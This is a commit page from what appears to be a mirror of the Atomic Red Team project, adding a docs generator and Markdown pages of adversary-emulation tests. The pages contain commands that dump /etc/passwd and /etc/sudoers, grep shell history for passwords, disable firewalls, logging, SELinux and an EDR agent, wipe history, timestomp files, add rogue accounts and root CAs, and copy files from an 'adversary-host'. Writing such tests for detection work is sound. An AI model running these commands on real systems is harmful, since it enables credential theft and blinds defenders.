security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first cut of atomic docs generator

Browse Source
This commit is contained in:
Brian Beyer
2018-05-10 13:26:34 -06:00
parent fddf3ef5b4
commit 92de69a6d5
15 changed files with 643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/atomic_doc_template.md.erb
+33
View File
@@ -0,0 +1,33 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
<%- if technique['identifier'].start_with? 'T' %>
MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<% end -%>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
### Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'] %>
```
<%- end -%>
<%- end -%>
atomics/t1046/t1046.md
+19
View File
@@ -0,0 +1,19 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Scan a bunch of ports to see if they are open
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
```
atomics/t1087/t1087.md
+79
View File
@@ -0,0 +1,79 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - List all accounts
xxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat /etc/passwd > #{output_file}
```
### Test #2 - View sudoers access
xxx (requires root)
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat /etc/sudoers > #{output_file}
```
### Test #3 - View accounts with UID 0
xxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
### Test #4 - List opened files by user
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
### Test #5 - Show if a user account has ever logger in remotely
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
lastlog > #{output_file}
```
atomics/t1089/t1089.md
+75
View File
@@ -0,0 +1,75 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Disable iptables firewall
Disables the iptables firewall
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
chkconfig off iptables
service ip6tables stop
chkconfig off ip6tables
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop firewalld
systemctl disable firewalld
fi
```
### Test #2 - Disable syslog
Disables syslog collection
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
```
### Test #3 - Disable Cb Response
Disable the Cb Response service
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
```
### Test #4 - Disable SELinux
Disables SELinux enforcement
**Supported Platforms:** linux
#### Run it with `sh`!
```
setenforce 0
```
atomics/t1099/t1099.md
+62
View File
@@ -0,0 +1,62 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Set a file's access timestamp
Stomps on the access timestamp of a file
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
```
### Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
```
### Test #3 - Set a file's creation timestamp
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
date -s "$NOW"
stat #{target_filename}
```
atomics/t1105/t1105.md
+48
View File
@@ -0,0 +1,48 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
#### Run it with `bash`!
```
### TODO: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
# Victim System Configuration
# Ensure SSH access has been configured for a victim account
# Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
# Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
# Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
# Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
# Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
# Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
```
atomics/t1123/t1123.md
+34
View File
@@ -0,0 +1,34 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - SourceRecorder via Windows command prompt
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** windows
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path to the recording file being captured | Path | test.wma|
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
#### Run it with `command_prompt`!
```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
### Test #2 - PowerShell Cmdlet via Windows command prompt
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
**Supported Platforms:** windows
#### Run it with `command_prompt`!
```
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
atomics/t1130/t1130.md
+25
View File
@@ -0,0 +1,25 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Install root CA on CentOS/RHEL
Creates a root CA with openssl
**Supported Platforms:** linux
#### Run it with `sh`!
```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
then
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
fi
```
atomics/t1136/t1136.md
+39
View File
@@ -0,0 +1,39 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Create a user account on a Linux system
Create a user via useradd
**Supported Platforms:** linux
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
### Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
**Supported Platforms:** macos
#### Run it with `bash`!
```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
atomics/t1139/t1139.md
+23
View File
@@ -0,0 +1,23 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
atomics/t1146/t1146.md
+78
View File
@@ -0,0 +1,78 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Clear Bash history (rm)
Clears bash history via rm
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
rm ~/.bash_history
```
### Test #2 - Clear Bash history (echo)
Clears bash history via rm
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
echo "" > ~/.bash_history
```
### Test #3 - Clear Bash history (cat dev/null)
Clears bash history via cat /dev/null
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
cat /dev/null > ~/.bash_history
```
### Test #4 - Clear Bash history (ln dev/null)
Clears bash history via a symlink to /dev/null
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
ln -sf /dev/null ~/.bash_history
```
### Test #5 - Clear Bash history (truncate)
Clears bash history via truncate
**Supported Platforms:** linux
#### Run it with `sh`!
```
truncate -s0 ~/.bash_history
```
### Test #6 - Clear history of a bunch of shells
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** linux
#### Run it with `sh`!
```
unset HISTFILE
export HISTFILESIZE=0
history -c
```
atomics/t1148/t1148.md
+22
View File
@@ -0,0 +1,22 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Disable history collection
Disables history collection in shells
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
#### Run it with `sh`!
```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
atomics/t1158/t1158.md
+16
View File
@@ -0,0 +1,16 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Create a hidden file in a hidden directory
Creates a hidden file inside a hidden directory
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
atomics/t1176/t1176.md
+50
View File
@@ -0,0 +1,50 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Chrome (Developer Mode)
xxx
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.
2. Click 'Load unpacked extension...' and navigate to
[Browser_Extension](../t1176/)
3. Click 'Select'
### Test #2 - Chrome (Chrome Web Store)
xxx
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
### Test #3 - Firefox
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"
2. Navigate to [manifest.json](./manifest.json)
3. Then click 'Open'
generate_atomic_docs.rb
Executable
+40
View File
@@ -0,0 +1,40 @@
#! /usr/bin/env ruby
require 'yaml'
require 'ostruct'
require 'erb'
def generate_docs!(path)
atomic_yaml = YAML.load(File.read path)
technique = {
# TODO GET FROM MITRE
'identifier' => "T1234",
'name' => "Create Account",
}
template = ERB.new File.read("#{File.dirname(__FILE__)}/atomics/atomic_doc_template.md.erb"), nil, "-"
generated_doc = template.result(binding)
output_doc_path = path.gsub(/.yaml/, '.md')
print " => #{output_doc_path} => "
File.write output_doc_path, generated_doc
end
oks = []
fails = []
Dir["#{File.dirname(__FILE__)}/atomics/t*/t*.yaml"].sort.each do |path|
begin
print "Generating docs for #{path}"
generate_docs! path
puts "OK"
rescue => ex
fails << path
puts "FAIL (#{ex} #{ex.backtrace.join("\n")})"
end
end
puts
puts "Generated docs for #{oks.count} techniques, #{fails.count} failures"
exit fails.count